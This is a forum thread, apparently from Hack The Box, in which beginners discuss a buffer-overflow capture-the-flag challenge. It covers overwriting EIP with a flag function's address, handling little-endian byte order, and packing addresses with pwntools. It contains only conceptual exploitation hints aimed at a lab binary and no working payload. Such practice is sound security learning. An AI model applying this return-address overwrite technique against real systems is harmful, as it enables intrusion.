0XDiablos bad characters?

Doing my first ever BOF and I need a nudge. I've found the offset for the EIP. My strategy at this point is to overwrite it with the address of the flag function. The problem is that I can overwrite it with stuff like "AAAA" or "BBCC" but as soon as I try to put in the correct hex for the return address, I get garbage in the EIP. I suspect some kind of "bad character" issue, but
maybe I'm totally going down the wrong path. Am I off base here? Thanks for any help. I'm not very good at asking for it.

Comments

  • I have the same problem here, I was looking for help

  • You can send them via echo -e "...\xFF" and you'll run jump to the function, I can jump to the specific funciton and run it but only locally. I'm having trouble sending the payload to the server

  • Don't forget to take into account the little-endianness of the architecture when writing your payload. If what you have in the EIP is backwards then that's the problem.

  • Yah. It's always the endianness that gets me on those too. Even when I remember it, i will do something silly like reverse the whole thing. Hehe.

    Hack The Box

  • edited September 3
    I'm essentially having the same issue, unfortunately, this type of attack is new to me so sorry if I sound like a muppet.

    I've found the offset and the address of the flag function. I've used python pwn to convert the address to the p32 value and as I increase the offset I can see it referenced then on the last offset increase suddenly the value changes completely. Bit baffled.
Sign In to comment.